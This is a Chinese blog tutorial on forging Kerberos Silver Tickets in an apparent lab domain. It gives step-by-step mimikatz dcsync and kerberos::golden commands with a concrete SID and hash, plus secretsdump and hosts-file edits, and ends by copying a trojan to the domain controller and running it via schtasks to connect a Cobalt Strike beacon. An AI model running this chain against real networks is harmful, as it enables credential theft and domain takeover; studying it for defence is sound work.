白银票据~

最新推荐文章于 2025-08-20 11:22:29 发布
原创 最新推荐文章于 2025-08-20 11:22:29 发布 · 787 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #系统安全 #网络安全

一. 白银票据的原理

白银票据就伪造ST票据, kerberoasting是破解ST票据中的服务用户hash值,有以下区别:

白银票据:伪造的ST使用的是机器用户的Hash值
Kerberoasting:破解的是ST的域用户的hash值

二. 白银票据的利用条件

1.域名
2.域sid
3.目标服务器名(域名)
在这里插入图片描述

4.可利用的服务

常见服务可以参考:https://blog.csdn.net/Cashey1991/article/details/6837202

5.目标机器用户的NTLM-HASH
6.需要伪造的用户名
在这里插入图片描述

三. 白银票据机器用户的hash值

1、如果有域中的管理员账号可以使用dcsync读取

lsadump::dcsync /domain:hack.com /all /csv

在这里插入图片描述
2、如果通过枚举出来一个域中的管理员用户,可以使用如下的命令

secretsdump.exe 域名/administrator:密码@IP
如出现编码错误输入 chcp936

在这里插入图片描述

四. 使用白银票据伪造常用服务

白银票据可以伪造的服务非常多,简单列举几个常用的

  1. CIFS
    在windows主机之间进行网络文件共享是通过使用微软公司自己的CIFS服务实现的(IPC)
    在这里插入图片描述

  2. LDAP
    可以实现ldap查询或者执行dcsync
    在这里插入图片描述

  3. HOST
    可以实现计划任务等
    在这里插入图片描述

五. 白银票据的各种制作方式和使用

使用mimikatz可以在线或者是离线(本地制作后上传)制作白银票据

kerberos::golden /domain:域名 /sid:SID /target:目标机器 /service:服务名 /rc4:NTLM-HASH /user:administrator /ptt
/ptt:加上制作后默认直接打入内存中,不会生成文件

在这里插入图片描述
在这里插入图片描述

使用的hash值必须与目标机器用户相对应

六. 域内机器下的白银票据制作和CS上线

控制了一台域内主机电脑现在要控制域控(通过kerberoasting)

第一步:检查电脑是否加入域并查看权限,加入域可以直接使用白银票据
在这里插入图片描述
在这里插入图片描述
第二步:查看域的sid值
在这里插入图片描述
第三步:伪造LDAP服务的白银票据并注入到内存中

kerberos::golden /domain:hack.com /sid:S-1-5-21-3176001243-559812214-128103957 /target:DC /service:LDAP /rc4:2c1cfa157eb8255a8bbbdba997459dc3 /user:administrator /ptt

在这里插入图片描述
第四步:通过dcsync查询域控上的hash值
在这里插入图片描述
第五步:用前面收集制作金票或者PTH,PTK,PTT等认证然后进行横向
在这里插入图片描述
第六步:使用之前的上线办法上线CS

在这里插入图片描述

七. 工作组机器下的白银票据制作和CS上线

在工作组中的机器使用白银票据的时候需要注意如下的问题

工作组机器的DNS必须修改成域控的IP(主要是工作组中的机器需要ping通域名)
如果不修改DNS,可以修改本地的HOST文件,将域名执行对应的IP地址

第一步:检查是否是域用户
在这里插入图片描述

第二步:修改DNS或者HOST文件,如果在ping不同域名的情况下需要修改

netsh interface ipv4 add dns 本地连接 192.168.41.10
echo 192.168.41.10 dc.hack.com >> C:\Windows\System32\drivers\etc\hosts

在这里插入图片描述

第三步:获取制作白银票据的条件,伪造CIFS服务

kerberos::golden /domain:hack.com /sid:S-1-5-21-3176001243-559812214-128103957 /target:DC /service:CIFS /rc4:2c1cfa157eb8255a8bbbdba997459dc3 /user:administrator /ptt

在这里插入图片描述

第四步:将木马copy到目标C盘下

在这里插入图片描述

第五步:伪造host服务

kerberos::golden /domain:hack.com /sid:S-1-5-21-3176001243-559812214-128103957 /target:DC /service:HOST /rc4:2c1cfa157eb8255a8bbbdba997459dc3 /user:administrator /ptt

在这里插入图片描述
第六步:使用计划任务上线CS

schtasks /create /s 192.168.41.10 /tn test /tr C:/1exe  /sc onstart /RU System /F  创建计划任务
schtasks /run /s 192.168.41.10  /u administrator /p Admin123 /i /tn "test"   运行计划任务

在这里插入图片描述

白银票据原理制作与利用
G3et的博客
01-19 452
1、如果是域普通用户,主要看防火墙,开了防火墙可能会导致dir过不去2、白银票据伪造的是ST,只能访问特定的服务,如cifs(文件共享服务)、winrm(远程管理)3、白银票据获取的是服务的hash4、白银票据不通过kdc,相对黄金票据银票更加隐蔽。
深入理解黄金票据白银票据攻击
渗透之路,攻防之间皆学问
02-14 690
黄金票据(Golden Ticket)是攻击者伪造的 TGT。因为 TGT 是由 krbtgt 账号的 NTLM hash 加密生成的,所以当我们拥有了 krbtgt 账号的 hash 时,可以直接在本地伪造 TGT 绕过 Kerberos 认证流程中的身份验证步骤,直接申请服务票据并访问域内资源。
域渗透 | 白银票据利用
无心的博客
10-30 3065
目录 0x01 介绍 0x02 白银票据利用 0x01 介绍 之前,我们已经详细说过Kerberos认证的流程,这次我们就来说说如何对其进行利用,这次主要说的是白银票据伪造(Silver Tickets) 白银票据伪造利用的是Kerberos认证中的第三个步骤,在第三步的时候,client会带着ticket向server的某个服务进行请求,如果验证通过就可以访问server上的指定服务了,这里...
内网渗透——黄金票据白银票据
来日可期的博客
10-11 5663
黄金票据(Golden Ticket):黄金票据指的是攻击者通过获取目标环境中域控制器(Domain Controller)上的krbtgt帐户的散列值,然后使用散列值生成伪造的票据。这种伪造的票据具有极高的权限,并且不受密码更改的影响。拥有黄金票据相当于拥有域内的最高权限,攻击者可以访问和控制所有域内资源。 白银票据(Silver Ticket):白银票据是攻击者通过获取目标环境中某个服务帐户(Service Account)的散列值,并使用散列值生成伪造的票据。这种伪造的票据允许攻击者模拟该服务账户的
白银票据的原理和使用
qq_45455136的博客
12-21 1343
白银票据的原理和使用 白银票据(Silver Ticket)原理 白银票据的使用 服务账号是计算机名字+$用来管理服务的账号 白银票据(Silver Ticket)原理 白银票据是伪造本该由TGS返回的ST(服务票据),从而访问对应的服务 有server用户的hash就可以伪造出ST,且不经过KDC,但伪造的票只对部分服务起作用,权限比黄金票据
Kerberos的白银票据详解
weixin_30532987的博客
12-26 4330
0x01白银票据(Silver Tickets)定义 白银票据(Silver Tickets)是伪造Kerberos票证授予服务(TGS)的票也称为服务票据。如下图所示,与域控制器没有AS-REQ 和 AS-REP(步骤1和2),也没有TGS-REQ / TGS-REP(步骤3和4)通信。由于银票是伪造的TGS,所以没有与域控制器通信。 0x02白银票据的特点 1.白银票据...
黄金票据白银票据,钻石票据,蓝宝石票据
最新发布
飞蓬的博客
08-20 822
票据类型使用的票据密钥类型要求权限范围隐蔽性伪造方式黄金票据TGT(伪造)krbtgtNTLM 哈希或 AES极高(域管理员)可检测离线伪造白银票据ST(伪造)服务账号(如 DC$)Hash特定服务(有限)隐蔽离线伪造 Service Ticket钻石票据TGT(修改合法 TGT)krbtgtAES-256 密钥可设任意权限更隐蔽解密–修改–重新加密蓝宝石票据TGT(含合法 PAC)krbtgt基于高级用户 PAC 权限极其隐蔽替换合法用户 PAC。
黄金票据白银票据详解
故事讲予风听
06-22 6359
在 Windows 系统中,存在许多突破用户权限或绕过系统保护机制的漏洞,攻击者可以通过利用这些漏洞,提升自己的权限并获取黄金票据。​ Golden Ticket是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。​ 每个用户的Ticket都是由krbtgt的密码Hash来生成的,那么,我们如果拿到了krbtgt的密码Hash,其实就可以伪造任意用户的TICKET,
Kerberos认证以及黄金票据白银票据的简单介绍
Reset
08-21 1368
Kerberos是一种网络身份认证的协议,协议设计目的是通过使用秘钥加密技术为客户端/服务器应用程序提供强身份验证,保护服务器防止错误的用户使用,同时保护它的用户使用正确的服务器,即支持双向验证。Kerberos协议的整个认证过程的实现不依赖于主机操作系统的认证,无需基于主机地址的信任,不要求网络上所有主机的物理安全,并假定网络上传送的数据包可以被任意的读取、修改和插入数据。简而言之,Kerberos作为一种可信任的第三方认证服务,通过传统的密码技术(共享密钥)执行认证服务。
【域权限维持】-白银票据
qq_41617902的博客
11-08 537
域权限维持-白银票据的攻击过程与简单检测方式
域内横向渗透-PTT票据传递之白银票据 (Silver Ticket)
m0_62783065的博客
09-22 572
PTT票据传递之黄金票据 Silver Ticket,介绍了白银票据的原理及其利用所需要的条件和利用方法。
权限维持-白银票据
m0_64815693的博客
06-04 431
权限维持-白银票据
域渗透-白银票据和黄金票据的利用
orange777
02-23 4122
最近做了一些靶场域渗透的实验,记录下一些关于白银票据和黄金票据的问题。 0x01 白银票据的利用 1 环境信息 域控DC 192.168.183.130 域内主机win7 192.168.183.129 2 使用场景 在拿到一个普通的域成员权限的时候,可以尝试使用ms14-068伪造一个票据,从而让我们的域用户有域管理员权限。 3 利用过程 说明:这里是用vulnstack4靶机笔记的实验环境,来演示一下利用过程 获取sid whoami /all 伪造票据 MS14-068.exe -u 用户名@域
一文搞懂黄金白银票据
m0_75218183的博客
06-29 1933
在学习黄金白银票据之前,我们先要搞懂Kerberos(三头保卫神犬)协议。Kerberos 是一种网络认证协议,其设计目标是通过密钥系统为客户机 / 服务器应用程序提供强大的认证服务。该认证过程的实现不依赖于主机操作系统的认证,无需基于主机地址的信任,不要求网络上所有主机的物理安全,并假定网络上传送的数据包可以被任意地读取、修改和插入数据。在以上情况下, Kerberos 作为一种可信任的第三方认证服务,是通过传统的密码技术(如:共享密钥)执行认证服务的。
白银票据/黄金票据构造分析
灰太的表格的博客
10-29 1078
白银票据/黄金票据构造分析
3.5 Silver Ticket白银票据制作原理及利用方式
GloryGod的博客
08-24 692
服务账号就是计算机名字+$用来管理服务的账号。
内网渗透:三、Kerberos协议及票据(黄金和白银)伪造
liu_jia_liang的博客
02-20 4307
一、Kerberos协议 kerberos(Secure network authentication system)中文叫网络安全认证系统 kerberos在进行认证过程中并不会传输用户的密码,而是通过传输tickets(票据)进行认证登陆到LDAP server。Kerberos协议主要用于计算机网络的身份鉴别,其特点是用户只需输入一次身份验证信息就可以凭借此验证获得的凭证(ticket-granting-ticket)访问多个服务,即SSO(Single Sign On)。由于在每个Client和S
白银票据及黄金票据的一些学习
dayouzi的博客
08-11 898
Golden Ticket(金票)是通过伪造TGT(TickerGranting Ticket),因为只要有了高权限的TGT,那么就可以发送给TGS换取任意服务的ST。可以说有了金票就有了域内的最高权限。对于攻击者来说,只要拿到了域控权限,就可以直接导出krbtgt的Hash值,再通过mimikatz即可生成任意用户任何权限的Ticket,也就是Golden Ticket。
内网渗透之黄金白银票据(Kerberos认证)简介
weixin_53958661的博客
12-28 1522
图解: Kerberos认证一共分为三个阶段: Kerberos认证一共分为三个阶段 AS-REQ---AS-REP阶段:(Client和AS的认证) 1.首先Client(客户端)用自己的哈希值(NTLM-hash)对(时间戳,客,服)等数据加密后,发送给AS(身份验证服务)向AS请求TGT票据。 -----AS-REQ---- 2.当AS收到Client发来的数据后,AS会向AD(域控)发起请求,询问是否有该client用户,如果有的话就取出client的...
域渗透 白银票据配置 伪造
03-19
### 域渗透中的白银票据与黄金票据 #### 白银票据 (Silver Ticket) 的配置与伪造方法 白银票据是一种针对特定服务的伪造 Kerberos 票据。它允许攻击者冒充某个用户身份来访问指定的服务,而无需获得整个域的控制权。 以下是伪造白银票据的过程: 1. **收集目标信息** 需要获取目标域的信息,包括域名 (`test.lab`) 和 SID (`S-1-5-21-...`)[^3]。还需要知道目标服务名称(如 `LDAP`)、目标主机名以及用于加密的目标账户哈希值(通常是 NTLM 或 RC4 密钥)。 2. **生成白银票据** 使用 Mimikatz 工具生成伪造的 LDAP 服务票据,并将其保存到文件中: ```bash mimikatz "kerberos::golden /domain:test.lab /sid:S-1-5-21-2196907948-52438630-2517523304 /target:DC.test.lab /service:ldap /rc4:065c43c4ca3bfba69038978836565ffe /user:administrator /ticket:silver.kirbi" ``` 3. **注入票据** 将生成的白银票据注入到当前会话的内存中以便使用: ```bash mimikatz "kerberos::ptt silver.kirbi" ``` 通过上述操作,攻击者可以伪装成管理员身份访问目标服务器上的 LDAP 服务[^2]。 --- #### 黄金票据 (Golden Ticket) 的配置与伪造方法 相比白银票据,黄金票据提供了更广泛的权限——它可以绕过 TGT 获取阶段直接创建有效的 TGT 票据,从而实现对整个域资源的无限制访问。 其主要步骤如下: 1. **提取 krbtgt 账户密码散列** 这一步通常依赖于已有的高权限凭证或者通过其他漏洞完成。例如,在拥有 Domain Admin 权限的情况下可以从 Active Directory 数据库导出 krbtgt 散列值。 2. **生成黄金票据** 利用 Mimikatz 创建自定义的有效期无限长且不受时间戳约束的 TGT: ```bash mimikatz "kerberos::golden /user:Administrator /domain:de1ay.com /sid:S-1-5-21-2756371121-2868759905-3853650604 /krbtgt:82dfc71b72a11ef37d663047bc2088fb /id:500 /ptt" ``` 此命令将自动加载新生成的黄金票据至当前进程环境变量中[^4]。 --- #### Kerberos 攻击技巧对比分析 | 特性 | 黄金票据 | 白银票据 | |--------------------|-----------------------------------|------------------------------| | 影响范围 | 控制全域能力 | 局部服务能力 | | 所需条件 | Krbtgt hash | Service account credentials | | 复杂度 | 较高 | 中等 | | 检测难度 | 更难 | 易被发现 | 尽管两者都基于相同的原理即滥用Kerberos协议机制,但由于作用层面不同所以在实际应用中有各自适用场景. ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值